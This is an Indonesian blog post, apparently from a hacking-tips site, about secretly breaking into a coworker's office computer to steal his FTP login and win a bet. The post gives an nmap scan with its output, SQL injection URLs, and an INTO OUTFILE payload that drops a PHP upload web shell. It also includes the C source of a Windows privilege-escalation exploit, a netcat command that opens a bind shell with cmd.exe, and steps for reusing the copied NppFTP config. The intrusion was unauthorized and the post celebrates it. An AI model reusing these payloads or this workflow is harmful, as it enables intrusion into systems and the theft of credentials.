• Beranda
  • Autosultan
  • Bitcoin
  • Dollar
  • Linux
  • LOKER
  • Printer
  • Sofware
  • sosial
  • TISniper
  • Virus
  • Windows

T.I Sniper

#Expert Advisor for MetaTrader 4 #Expert Advisor for MetaTrader 5 #youtube #google #free dollar business every day #Lowongan #Pekerjaan #Loker #forex #trading Autopilot #mining crypto #Update #Tutorial #Komputer Perbaikan, #Email #Facebook , #whatsapp ,#instagram #telegram ,#Internet ,#Motivasi , #Crypto , #AirDrop, #Bitcoin, #Ethereum, #Binance coin, #Cardano, #Degocoin, #Litecoin #Indodax, #Coinbase, #Nexo Dan Mata Uang Digital Lain , #Website, Perbaikan #Server #Domain , #Hosting, #Whm

    • Beranda
    • Contact Forum
    • Coffee JKs88
    • Tentang Kami
    • Parse Code Html
    • Text Terbalik
    • Privacy Policy

    Ikuti Kami!

    Follow Akun Instagram Kami Dapatkan Notifikasi Terbaru!
    Ikuti Kami di Facebok! Untuk mendapatkan notifikasi terbaru.

    Postingan Populer

    Backlink dengan Google Dork Seo

    Dork Seo
    Januari 01, 2016
    0

    Cara Dapat Backlink dengan Google Dork

    Dork Seo
    Februari 13, 2016
    0

    Download File ISO Windows 11 Dan Bootable USB Rufus

    Sofware Windows
    Desember 02, 2021
    0

    Cara Dapat Backlink Edu Gratis

    Seo
    Februari 13, 2016
    0

    FORUM 

    FORUM
    Desember 31, 2021
    0
    Author
    chmood
    Tautan disalin ke papan klip!
    Share Posts "Taklukkan Sasaran Tanpa Menyentuhnya - Code Igniter Hack's Trick"
  • Salin link
  • Simpan Ke Daftar Bacaan
  • Bagikan ke Facebook
  • Bagikan ke Twitter
  • Bagikan ke Pinterest
  • Bagikan ke Telegram
  • Bagikan ke Whatsapp
  • Bagikan ke Tumblr
  • Bagikan ke Line
  • Bagikan ke Email
  • HomePheakingVulnwebsiteTaklukkan Sasaran Tanpa Menyentuhnya - Code Igniter Hack's Trick
    Taklukkan Sasaran Tanpa Menyentuhnya - Code Igniter Hack's Trick

    Taklukkan Sasaran Tanpa Menyentuhnya - Code Igniter Hack's Trick

    Simpan Postingan

        Suatu ketika, teman saya mengerjakan proyek bersama. Mereka menggunakan Code Igniter sebagai core engine system nya.

        Ketika di kelas, ngobrol galor ngidul, dan membahas proyek tersebut. Ketika membahas "kenapa memilih CI", teman saya bilang karena ci adalah framework, mudh di kerjakan, cepat, dan team-friendly.
    Lalu saya menambahkan, iya sih. Selain itu "CI" juga relative lebih aman dari serangan hack. Saya juga mengatakan, selama ini saya belum pernah berhasil menembus keamanan CI.
    Kemudian, teman saya menambahkan "iya, kata mas xxx, ci ama. Coba suruh [menyebut namaq] untuk ngehack, pasti gak bisa"

    Nah, dari situ, saya merasa tertantang. Langsung tak jawab, "oke, klo bisa, saya di traktir ya"

    So, berawal dari situ, saya mulai mencari cara menaklukan system nya yang menggunakan code igniter.

    Memutar otak, saya sendiri belum pernah menembus keamanan ci. Jadi, gm nih menembusnya.

    Oke, putar otak. Banyak jalan menuju roma. Banyak pula jalan untuk menaklukkannya. Satu jalan tidak bisa, jalan lain, pasti ada yang bisa.

    Saya mulai memetakan bagian bagian system tersebut. Sebuah system, tentu saja terdiri dari banyak bagian. Ada program, hosting, cms, framework, user, network, developer, programmer. 

    Mulai menyerang salah satunya -> hosting.
    Bisa jadi kan system nya memakai shared hosting, sehingga saya bisa saja masuk ke salah satunya lalu melompat ke system sasaran. Setelah lookup domain, ternyata hanya ada 1 domain saja. Dengan arti, memakai ds/vps.

    Dari hasil ngobrol selama ini, saya ketahui bahwa team dia menggunakan ftp untuk mengupdate program secara online dimanapun. Teman saya menggunakan editor favoritnya, notepad++. Di software tsb, terdapat plugin NpFTP, yaitu ftp integrated pada notepad++.

    Menilik sisi lain, dn yang terdekat, adalah programmer, yaitu teman saya sendiri. Hehehe **sory bro**

    Bisa saya simpulkan, teman saya menggunakan NpFTp untuk mengakses dan update program. Jadi, saya bisa saja mencuri ftp tersebut dari computer tema saya untuk mendapatkan akses ke hosting sasaran.

    Sebagai catatan, karena proyek yg menggunakan CI sudah dinyatakan *selesai*, jd saya akan mecari sasaran yg lain, namun dengan teknik yg sama.

    Let's go.

    Teman saya ini bekerja 1 kantor dengan saya. Sehingga di kantor, sy tentunya berada 1 jaringan dengan dia. Saya bisa menyerang dia disana.

    saya bisa saja mendatangi komputernya, denga alibi pinjam computer, lalu memasukkan backdoor secara langsung, atau keylogger, atau Trojan, atau semacamnya lah. Namun cara ini bukan "hacking" banget. Tantangan yg saya terima adalah "ngehack", jadi harus saya lakukan dengan cara "hacking". Jadi saya harus melakukannya tanpa menyentuh komputernya sedikitpun.
    Saya mulai dengan mencari tau ip nya. Scanning ip local.

                                           



    Percaya atau tidak, saya membuka semua ip yang alive, demi mendapatkan ip sasaran. Setiap ip, saya buka network sharenya. 

                                      

    Dan saya mendapati ip 172.17.12.139 adalah ip nya. Darimana saya tau? Dari http local nya dia. Dia pernah membicarakan mengenai career-center. Di ip ini terdapat aplikasi ini, saya yakin sekali ini adalah komputernya.

                                                               

    Kemudian, scaning. Mungki ada sesuatu yang berguna yg saya temukan.




    Nmap –T4 –A 172.17.12.139



    Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-16 15:24 SE Asia Standard Time 

    NSE: Loaded 110 scripts for scanning. 
    NSE: Script Pre-scanning. 
    Initiating ARP Ping Scan at 15:24 
    Scanning 172.17.12.139 [1 port] 
    Completed ARP Ping Scan at 15:24, 0.31s elapsed (1 total hosts) 
    Initiating Parallel DNS resolution of 1 host. at 15:24 
    Completed Parallel DNS resolution of 1 host. at 15:24, 16.50s elapsed 
    Initiating SYN Stealth Scan at 15:24 
    Scanning 172.17.12.139 [1000 ports] 
    Discovered open port 443/tcp on 172.17.12.139 
    Discovered open port 53/tcp on 172.17.12.139 
    Discovered open port 8080/tcp on 172.17.12.139 
    Discovered open port 80/tcp on 172.17.12.139 
    Discovered open port 3128/tcp on 172.17.12.139 
    Completed SYN Stealth Scan at 15:24, 4.83s elapsed (1000 total ports) 
    Initiating Service scan at 15:24 
    Scanning 5 services on 172.17.12.139 
    Completed Service scan at 15:24, 12.38s elapsed (5 services on 1 host) 
    Initiating OS detection (try #1) against 172.17.12.139 
    Retrying OS detection (try #2) against 172.17.12.139 
    NSE: Script scanning 172.17.12.139. 
    Initiating NSE at 15:24 
    Completed NSE at 15:25, 18.73s elapsed 
    Nmap scan report for 172.17.12.139 
    Host is up (0.00014s latency). 
    Not shown: 995 filtered ports 
    PORT STATE SERVICE VERSION 
    53/tcp open domain? 
    80/tcp open http Apache httpd 2.2.21 ((Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1) 
    |_http-favicon: Unknown favicon MD5: 3BD2EC61324AD4D27CB7B0F484CD4289 
    | http-methods: GET HEAD POST OPTIONS TRACE 
    | Potentially risky methods: TRACE 
    |_See http://nmap.org/nsedoc/scripts/http-methods.html 
    |_http-title: Index of / 
    443/tcp open ssl/http Apache httpd 2.2.21 ((Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1) 
    |_http-favicon: Unknown favicon MD5: 3BD2EC61324AD4D27CB7B0F484CD4289 
    | http-methods: GET HEAD POST OPTIONS TRACE 
    | Potentially risky methods: TRACE 
    |_See http://nmap.org/nsedoc/scripts/http-methods.html 
    |_http-title: Index of / 
    | ssl-cert: Subject: commonName=localhost 
    | Issuer: commonName=localhost 
    | Public Key type: rsa 
    | Public Key bits: 1024 
    | Not valid before: 2009-11-10T23:48:47+00:00 
    | Not valid after: 2019-11-08T23:48:47+00:00 
    | MD5: a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0 
    |_SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6 
    |_ssl-date: 2014-01-16T08:24:52+00:00; 0s from local time. 
    | sslv2: 
    | SSLv2 supported 
    | ciphers: 
    | SSL2_DES_192_EDE3_CBC_WITH_MD5 
    | SSL2_IDEA_128_CBC_WITH_MD5 
    | SSL2_RC2_CBC_128_CBC_WITH_MD5 
    | SSL2_RC4_128_WITH_MD5 
    | SSL2_DES_64_CBC_WITH_MD5 
    | SSL2_RC2_CBC_128_CBC_WITH_MD5 
    |_ SSL2_RC4_128_EXPORT40_WITH_MD5 
    3128/tcp open squid-http? 
    |_http-open-proxy: ERROR: Script execution failed (use -d to debug) 
    8080/tcp open http-proxy? 
    |_http-open-proxy: ERROR: Script execution failed (use -d to debug) 
    MAC Address: 00:0C:42:BE:02:9D (Routerboard.com) 
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 
    Aggressive OS guesses: Linux 2.6.32 (94%), Linux 2.6.19 - 2.6.36 (92%), Linux 2.6.31 - 2.6.35 (92%), Check Point VPN-1 UTM appliance (91%), Infoblox Trinzic network control appliance (90%), Linux 2.6.32 - 2.6.35 (90%), Android 3 (Linux 2.6.36) (89%), Linux 2.6.32 - 3.9 (89%), HP P2000 G3 NAS device (88%), Linux 2.6.17 - 2.6.36 (88%) 
    No exact OS matches for host (test conditions non-ideal). 
    Network Distance: 1 hop 

    TRACEROUTE 
    HOP RTT ADDRESS 
    1 0.14 ms 172.17.12.139 

    NSE: Script Post-scanning. 
    Read data files from: C:\Program Files\Nmap 
    OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
    Nmap done: 1 IP address (1 host up) scanned in 61.65 seconds 
    Raw packets sent: 2049 (93.464KB) | Rcvd: 54 (5.948KB) 


    Hhmmm tidak ada port yg menarik.
    Mencoba keberuntungan dengan mengakses phpmyadmin. Mgkn tidak berpassword. Ato password mudah di tebak. Atau mungkin bruteforce phpmyadmin

                                            

    Access forbidden!
    New XAMPP security concept:
    Access to the requested object is only available from the local network.
    This setting can be configured in the file "httpd-xampp.conf".
    If you think this is a server error, please contact the webmaster. 
    Error 403 
    172.17.12.139 
    01/16/14 15:27:31 
    Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1 
    Ups!!! Hahahaha. Ini adalah salah satu bentuk keamanan xampp, dimana akses ke phpmyadmin dibatasi hanya dari localhost saja.
    Berbekal pengetahuan itu, saya mencoba melakukan local proxy reverse. Dengan menggunakan ip sasaran sebagai proxy.

                                       

    Lalu membuka localhost atau 127.0.0.1

                                          

    Oopssss tetep forbidden. Kenapa ya? Whatever lah. Cari jalan lain.
    Mulai browsing-browsing localhost kompi nya. Mencoba mencari sesuatu "upload" atau exploit-exploit standard.
    Dan mata saya tertuju pada aplikasi ini:


    Ada fasilitas edit disana. Dan tentunya file upload.


                      


    Browse backdoor. Klik save. Dan jrenggg… backdoor saya di rename jadi .jpg. hahahaha. Sial deh.
    Sialnya, hanya ini satu-satunya file upload yg terbuka. Oke, cari lubang lain.
    Saya mencoba celah sql injection disana. Dan saya mencapatkannya disini:





    http://172.17.12.139/sia-praktikum/site.php?pg=cust&act=edit&edit=1'


    dari error yang terjadi,





    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in D:\MYWORK\xampp\htdocs\sia-praktikum\cust_edit.php on line 82



    saya mengetahui bahwa dokumen root ada di disini:

    D:\MYWORK\xampp\htdocs

    setelah mendapatkan jumlah kolom (yaitu 6 kolom) saya mencoba kolom mana sih yang di tampilkan.




    http://172.17.12.139/sia-praktikum/site.php?pg=cust&act=edit&edit=0'+union+select+1,2,3,4,5,6--+



    dan saya mendapatkan kolom nomor 5 yang di tampilkan.
    Oke, dari sini, saya mencoba melakukan backdooring over sql injection. Melakukan loadfile configurasi database sepertinya tidak berguna, mengingat akses phpmyadmin tidak bisa.
    Saya mencoba create file.
    Pertama-tama, test dulu.




    http://172.17.12.139/sia-praktikum/site.php?pg=cust&act=edit&edit=0'+union+select+1,2,3,4,'abcde' ,6+into+outfile+'D:/MYWORK/xampp/htdocs/sia-praktikum/cust_edit.txt'--+


    ups! Error





    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in D:\MYWORK\xampp\htdocs\sia-praktikum\cust_edit.php on line 82


    Dari situ, sudah ilfil jangan2 misi gagal. Saya coba iseng membuka file nya:





    http://172.17.12.139/sia-praktikum/cust_edit.txt


    dan ternyata saya mendapatkan ini:


                                   


    Wowww ternyata berhasil create file.
    Oke. Sekarang waktunya memuat backdoor. Simpel backdoor saja, hanya uploader.





    http://172.17.12.139/sia-praktikum/site.php?pg=cust&act=edit&edit=0'+union+select+1,2,3,4,'<form method=post enctype=multipart/form-data><input type=file name=f><input type=submit /><?php if($_FILES[f][tmp_name]){move_uploaded_file($_FILES[f][tmp_name],$_FILES[f][name]);} ?>',6+into+outfile+'D:/MYWORK/xampp/htdocs/sig-universitas/images/z.php'--+


    dan error seperti sebelumya





    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in D:\MYWORK\xampp\htdocs\sia-praktikum\cust_edit.php on line 82


    Error? No problem. Lgsg buka backdoornya.





    http://172.17.12.139/sig-universitas/images/z.php



                                  

    Kemudian, upload backdoor sesungguhnya.



    Berdasarkan hasil googling, NpFTP meletakkan konfigurasi user dan password di direktori

    C:\Users\[NAMA USER]\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml


    Sehingga saya cukup mencuri file tersebut, dan misi selesai.
    Browse ke direktori c:/users. Terdapat terdapat usernamenya dia "xxx". Coba masuk, namun permission denied. Saya perhatikan, user id yg tertera di shell saya, adalah "john".
    Berarti, saya harus melakukan takeover administrator.
    Hasil googling "win7 local privileges escalation", saya mendapatkan exploit ini:
    http://downloads.securityfocus.com/vulnerabilities/exploits/57135.c



    #include <windows.h>

    #include <stdio.h>


    int main()
    {
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};
    PCHAR payload[] = {
    "echo \".___ _____ ______________ ______________ \"> %USERPROFILE%\\Desktop\\TROLOLOL",
    "echo \"| | / \\ \\__ ___/ | \\_ _____/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
    "echo \"| |/ \\ / \\ | | / ~ \\ __)_ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
    "echo \"| / Y \\ | | \\ Y / \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
    "echo \"|___\\____|__ / |____| \\___|_ /_______ / \">> %USERPROFILE%\\Desktop\\TROLOLOL",
    "echo \" \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
    "echo \" _______ .___ ________ ________ _____ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
    "echo \" \\ \\ | |/ _____/ / _____/ / _ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
    "echo \" / | \\| / \\ ___/ \\ ___ / /_\\ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
    "echo \"/ | \\ \\ \\_\\ \\ \\_\\ \\/ | \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
    "echo \"\\____|__ /___|\\______ /\\______ /\\____|__ / \">> %USERPROFILE%\\Desktop\\TROLOLOL",
    "echo \" \\/ \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
    "exit",
    NULL
    };

    printf("1] Spawning a low IL cmd.exe (from a low IL process)..Rdy ? Press to continue\n");
    getchar();

    si.cb = sizeof(si); 
    CreateProcess(
    NULL,
    "cmd.exe",
    NULL,
    NULL,
    TRUE,
    CREATE_NEW_CONSOLE,
    NULL,
    NULL,
    &si,
    &pi
    );

    Sleep(1000);

    // Yeah, you can "bruteforce" the index of the window..
    printf("2] Use Win+Shift+7 to ask explorer.exe to spawn a cmd.exe MI..");
    keybd_event(VK_LWIN, 0x5B, 0, 0);
    keybd_event(VK_LSHIFT, 0xAA, 0, 0);
    keybd_event(0x37, 0x87, 0, 0);

    keybd_event(VK_LWIN, 0x5B, KEYEVENTF_KEYUP, 0);
    keybd_event(VK_LSHIFT, 0xAA, KEYEVENTF_KEYUP, 0);
    keybd_event(0x37, 0x87, KEYEVENTF_KEYUP, 0);

    Sleep(1000);
    printf("3] Killing now the useless low IL cmd.exe..\n");

    TerminateProcess(
    pi.hProcess,
    1337
    );

    printf("4] Now driving the medium IL cmd.exe with SendMessage and HWND_BROADCAST (WM_CHAR)\n");
    printf(" \"Drive the command prompt [..] to make it look like a scene from a Hollywood movie.\" <- That's what we're going to do!\n");

    for(unsigned int i = 0; payload[i] != NULL; ++i)
    {
    for(unsigned int j = 0; j < strlen(payload[i]); ++j)
    {
    // Yeah, that's the fun part to watch ;D
    Sleep(10);
    SendMessage(
    HWND_BROADCAST,
    WM_CHAR,
    payload[i][j],
    0
    );
    }

    SendMessage(
    HWND_BROADCAST,
    WM_CHAR,
    VK_RETURN,
    0
    );
    }

    return EXIT_SUCCESS;
    }




    Mari kita coba. 
    Pertama-tama, upload dulu nc.exe ke computer korban. Kemudian jalankan listening.





    nc -vlp 9090 -e cmd.exe –d


    saya menggunakan opsi –d, untuk mengakses menggunakan telnet.
    Setelah command sayajalankan, saya membuka cmd.exe di computer saya, kemudian membuka telnet ke computer korban dengan port 9090 (sesuai listening). Dan syg mendapatkan tampilan telnet dengan command prompt dari computer korban.


                 

    Setelah menjalankan exploit tsb, saya tetap gagal. 
    Sumpah ane puyeng, gmn nih nembusnya. Udah googling-googling, tetep gak tembus.

    Akhirya, setelah ngopi bentar, saya berfikir, kalau teman saya login di windows (menggunakan komputernya), dan aktif usr pada shell adalah john, berarti dia login sebagai user john. Aha!! Mari kita coba masuk dan lihat isinya.



    C:\ Users\ john\ AppData\ Roaming\ Notepad++\ plugins\ config\ NppFTP\ 






    <?xml version="1.0" encoding="UTF-8" ?>

    <NppFTP defaultCache="%CONFIGDIR%\Cache\%USERNAME%@%HOSTNAME%" outputShown="0" windowRatio="0.776846" clearCache="0" clearCachePermanent="0">

    <Profiles>

    <Profile name="survey" hostname="202.154.57.214" port="21" username="adiv2" password="78DF6964B5" askPassword="0" timeout="30" securityMode="0" transferMode="0" connectionMode="0" dataPortMin="10000" dataPortMax="32000" listParams="" initialDir="" keyFile="" passphrase="" useAgent="0" acceptedMethods="1">
    <Cache />
    <FileTypes asciiTypes="" binaryTypes="" />
    </Profile>
    </Profiles>
    </NppFTP>


    **password dan hostname sudah saya rubah demi keamanan privasi.
    Dari bentuk password nya: 78DF6964B5
    Bisa jadi password itu adalah bentuk hexa.
    Saya coba decrypt 2 digit pertama, mendapatkan string. Kemudian decrypt semua, saya mendapatkan bentuk seperti ini: xßidµ
    Apakah benar itu passwordnya? Saya sudah coba konek ke ftp, namun gagal.
    Hhhmmm… berfikir lain. Jika saya menggunakan notepad++ dan memasukkan file config trsebut, tentunya saya bisa login juga tanpa decrypsi password.
    Oke. Saya masukkan file NppFTP.xml ke direktori saya:





    C:\Users\ArRay\AppData\Roaming\Notepad++\plugins\config\NppFTP




    Buka notepad++, buka ftp plugin, dan klik koneksi: dan saya mendapatkan tampilan seperti berikut:


                                                 



    Klik 'survey', dan…

                                          

    waktunya minta traktir… :v
    Mission completed!
    Trik seperti ini, hanya sebagian kecil dari banyak trik untuk mendapatkan akses ke suatu sasaran, bahkan tanpa menyentuh sasaran secara langsung. Salam Family T.I Sniper

    Pheaking Vuln website
    September 22, 2015 • 0 komentar
    Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.
    Isi dari komentar adalah tanggung jawab dari pengirim. T.I Sniper mempunyai hak untuk tidak memperlihatkan komentar yang tidak etis atau kasar. Jika ada komentar yang melanggar aturan ini, tolong dilaporkan.

    T.I Sniper

    Your description here

    • Follow
    • Autosultan
    • Wa Admin Bisnis
    Copyright ©2010 - 2022 🔥 T.I Sniper.
    • Beranda
    • Cari
    • Posting
    • Trending
    • Tersimpan